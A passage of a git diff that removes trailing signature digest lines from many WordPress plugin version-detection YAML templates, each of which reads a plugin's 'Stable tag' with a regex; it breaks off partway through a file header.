@@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e932fa64065dc4cdeebeb42058850cc5f4294a7f6c7053184bc87bf22e793104022061218a1b1acd18b8a486b774132772813cfbb9fe3f07560487c863ac142ad0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index f7d21ca615..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210080da665152dc9dad7521d666bdc980e45034ef86a8d62dfc66156831816bc947022100d1e663f48d2428e229d6739cd25c2b199a9f65940c62abd578ef9e473a5117a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index c9f18f71e4..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043870f22709bd131c84a80b6f314d05f0379871911ee34a5ac7a13d8e51b4f8d02201790a0abcd60ce6f4f6c4f882ffb78de206e227ad833b454ab69b3ddadabb52e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 9489994c9c..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205ab59e65278cef816036d4b0cd35723e9d5741cb7ff56f3781f2651005e07fa2022100a27fb38218796cdf9f1949bfd83bc3322756aaf7d6175e030edfda9d08e84cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5b17e2e624..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008760e41f71f5e55e3a724654377afb7c3758321bbaeffb92df515f92405cfb92022100c97f23dbfb08a60b4933b88292e0400d168eabcd5e9b9fbd16e96cb15fd3a68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 38762df0da..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220051f0860e0bb441d1a933020af5035db92fbed5d642c53780792ccf0ab4aab8a022100ae300d570ff853858b9e9e71219f205ff5daf2d98b01653d79d9948912c20ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index a743c39b66..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab212ebed5ce5a9519685d54d1311ec749cb7556d2719e69ddfb0061de5a5f98022100bd4be336e6fb47d0e2867e328325715a190d1da4cdda1d12076a593a828b2fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 27f1cbca0a..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220594366d7f84d4fea2f68a96f5b54beb28e3dd70cf42191ce4631029027e69f860221009dff6a0029fba48f5a9518a7f2f9da0eb7a628a837743dca0b29585a0ecc43f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 84de1cb0e4..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e5a137a6501d2bf1e4ac9ed4eb8212d7ef1c14dcf741431331230750ca7e0e5022100eaf8925ef8a456a64b8cbbc7cdcbc37de611d301c3ff6e892a49f838b6613bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06c2e3a99f..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008db1b50efb02b215554eb7b329dcd126b16fe98f4f1ead0a27df15326bafaf2d02200c48e83f1bfa853f64505af85a4541a30b19ba284e05308d4f15d9b204889449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 9823bddf5f..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e3c7f595487fbcf1e24fbb4479a699f930b702cfb7043f9934633d9176526010220483612aafe15c6bd5640a52a7dc5be1314d176ae984923e331a1d2a3437e69bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 479bd366c5..d94b4228a9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085bb54885a3c648b3dedc6c663b1bd0d78cfa1a0d368106b989de3ecb3a300a9022100aad01a7379643668cd5c1aff8491b855de106378303241440103ef5a8211f958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index e2e53c61a5..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014efa8d944c7f028f0761698013511be82d9f247cc0e0a6ffecfe2f465d8827b02204c7b11b1b115fed7e17474f5739e91e2aced62903da0ff678ef7942454d21912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index daff3429ef..1b4769d0a7 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e96feae7ca7397658738c3af0e68a5380e9c13fdb8ab0ee1361dabaf6a83f72022100b8429e89fa147da8ba57e9c8e6d7cf5910863ca285cd8d1bc0cdca6b3c2ae683:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 9fa1eaf3c5..c2cd4ede1b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092716d95942b11f1fa494b21eaec2867f27de061f8f3f7e5446f212ea03fe58702200d46933f65001d0ee04b2dab16c662366a36955204917dc33e8d3ed648bfbdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6e2a60a10b..03e6c13ec5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a8acdc8026226ae061c4472e3f041344239d6e3e85a2555638fafdd7107b632022100aafe8dc24c92d0a3ad7e9a0c2356ff67362b0215f8d7cf0c41ca3e686480d81f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 86440c1822..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c28c39f245f1d7e51d105c75b4d6194599adf728b77743c8da44016cb2a6bdc10220391ecbd62a81f4cf09feae302e171c932fa23aa5e32ee6b27f0776a9d8ca8d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index a4dfc0bcac..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082a1b56556e47f3d639c7498071f83e2f803bbac3b90a4d40debbe419d37600a0220276a63d9f07865d80b1fd1333996d36196aa8d1189d4bdf1cfda924003b73779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 5453c8cf58..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad829bde75812a5247abb3e748ae83b6d500e40783f53114441724468fd8d50c022002afe7999062b3c564c87d7c440e47f84ed3e45478e0655318fe50b508a370f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b9a03406a9..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c479143efe42f4bf7ea26867b5a8bad2faad0fd2de589c1e980b6abd1d3c5b9b0221008137d8ac0d5abad8912375039347cd27260138fb4f7e32113fe10cd7bcce31af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index ef589bc125..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df7c0aeb1645f2ed48b8bc57a48c79aa7e5d591044f94ca6f36fd50994fce24c022100ebd0d905f9911a4e4b48b417e0bb94ed8ba1a060155af07fa562f5f1da579998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 7e28f5c323..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b531c487daf427dee07fe3abc1b39712a3e3853025adeaf51a8a02be4444a9fd022038752ad29402c167f3bf973fb831c045b6b7fe89961147f3363b9dc07a190223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index bf0157d292..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c98d8603bf1551a7929951975654f24707dc2dbac0a52ae79b8ea64d1987989b022100eb6877319c828fe5ae313f2243edb59568400bdc629657e845bfb2952c28e22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 53c93b7d79..d74de07e8e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9ef5c5a40525cf9543335c4a1359f89987b929ad634e120f5946a34ce8ae285022100fda57c0b93eda5c506d0b34bc808e71e0fba3c5bcf6c553767c055510368f226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index f0dcb2d5e3..e5cfe47925 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e121bc6579c4c45b18a188437c7a70566064d082295e93ccb7cb0b2fcf7c9f45022100b878be783b44b48a3eafeab93778f5f0be3641c72389f5090817b7c9e682cca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index d31330353b..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd12c760c7c5f1b84dba3d7fdcd47748e319f2c163fee5319252564adc13cee40221008704543d223abf44ad885da252b3c9936f189a7a3947c137cbe9b418f9ab9e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 56e09bd029..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205ff923e282e3f5dbb46110c61d8e6258fbf42118937dfbbbc5f1adbf35bbead0022100b526c832757d9d6d22e1312436bba5d6b34bc41173f4c2888af8a5b26ff55081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 93bd1e06de..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2e7b5565f2b92811350f5cce6f0b2e2631076ac8c6ea17f5bfddbbb1e56aea0022038e4ea6ecc6cba3cb08b5852eb5d713daf1df24dc1145251155cd71704ba5af9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 5d5111f40e..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047b277e8a68a8b74ed748dbd516493fb92d9cea450b85ed76e442688509e238002207e2c574e0b9e45c2e30601944731e957c97d0484bf666e96e5a91477b5c928f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 7ba7971a5c..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e08a6b172c4cb2c6e9007617dcec27a2fd5ecf688db4a31440fceadc7e80030022100c976162f868b91e85d070a327cb564dc1216137e93d93a98b3e3691f140656c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7fe31e27f3..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050272ba9701f896cc557248326657e57fcbd66c9d1b03496d4a9206da46aa51c022100910a49a6d3217fbca3d1680d5f5c3332d3bb552ceaf18c0e7b54eca3bfd40782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index dca269b00a..d86e0557ae 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4d51f7577a72d48a9820e174384f7a638530926c44333554878b78af37780cb02202522edb27ec8fc966c6783529f7e9c42013f832654594d274c380371a348f73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index e013b773a7..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5d857914084f4f54888109ee833bcbea71ac393cf61fc65e30eafdf52713365022100c817562f748d3ec0077436eee847f73431404f961df08afed642550f6b65c3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 7210e18c90..4ae34395fa 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a21dfa2d4839d0bc2dbcce7779bc9e204faaea449923f7c581c0af91e73403de0220505a4a071757c9e9943395b090719d9c48063e3e0ac93705b9e6210b586abc8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index f8398ab77a..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022074a709b836893821bac042a4a41339073a90e6ea0e3932c4e50c5691b50f10ca02205a67bb219dc670293bbaa013f2c1a568482fb3c81d6a7bf43379a2a7d9ef2239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index a980482c2d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206910e237fa250a88a679cd7e6c7b9f975f2d4c4921e28d044cdb769b98534e890221009fa9300a10f479d2019279807c302ce7398c737cf5920b2972f2ee3eff5b6c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 9e0ccd5a65..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3ca3c29f5ffa73203f1537e927563bcebbe45e281ad800edf2f69937f105c39022100e6b7b0cd638908a40a1328fae33c4ed02e7fe45aa994bd1b6f14f8dc8f4b312e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index caacfb333d..aa36122d85 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9b0691206a53f01b0afd4210926a11717ecc22d11bf1c42074aa9c9c07034a40221009470ce7a23f21f6bbfb911d8504fad2a7cb451019c829e706ddfbaa9c01ad911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 1461662487..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d030ab25652d01d5aeee2b4bc5d76bb481aa34fc159fd2b8a01ce68031b53ada022100905bca5128ae8c365c68959ca6fba479f30283d240f5f9fbc3da1f0f2bd0a09f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 4166d8c09c..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5c30e6fc79bc8f1bdcc448653fb4f911d1959f3031e1a85f3921ac7e7411fbb022100fca3ca6978bce002504928f42e203705a11580db5cdf97e9d9ff9b5e975795ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 3442b04140..1d00a5705d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a46b1801e01b7d29e2a4db2aa5f587dd5211079578d5d0e6880b89e20c3ba9d022041c9b474f24c5650b5b3ccc0b49fe3883d3e1b29a2446e4df0762f16fb7314af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 87c8d622e0..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cce41a487194d88d73f6554054ba5181e4aeba6d6ce27651fddbba8d590a620022100d0607cb66c7d3deb82d3e039c72da752e4efc56b1b533df7fb07240f5c1682a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 6206059f59..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220229812433cd7874f153be85c04374e4d428f27904ad92c34af7f8650503c0aa902207ede805eb9dd744fe430808b745ddb73e3f210c89179f81003f069c16966e984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 31c0dc1a1e..3dbb03067b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220343287f81e577d7e5c9baed2d600057d936890b7513e7293b2ce94418c3e26bd02205762d66b437ff462fa80c415c2a5e2cbec5248507fa78001ddde6ff0bf27e32a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7f0ac4e443..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201cf605f8fc76955378c66455616b494e0192bd9bd830a4b0596babae3d2f3773022009afeed722fecd988cd7a3c87c8c675d2022fac9167d330c9ea90a15e99f5d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index a91be1290d..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3227e966337c01c073393d88ed993dd6b7a7f2c59f8da489f98c617f2fe4bae022100df4a30b3af363d2f84d6973f7c7995cd0a4cf82a6318fc61d0da4da0426f8606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index f0be38fc55..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3317c43923a03cb84145f14e47dd2926385cc5e7232cf6f7cb0eaf0e9f855da022100ae0b72e146871ed04e3fc02322c4a6e3c962d1519fdae40d34ffcd6202bf8d7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 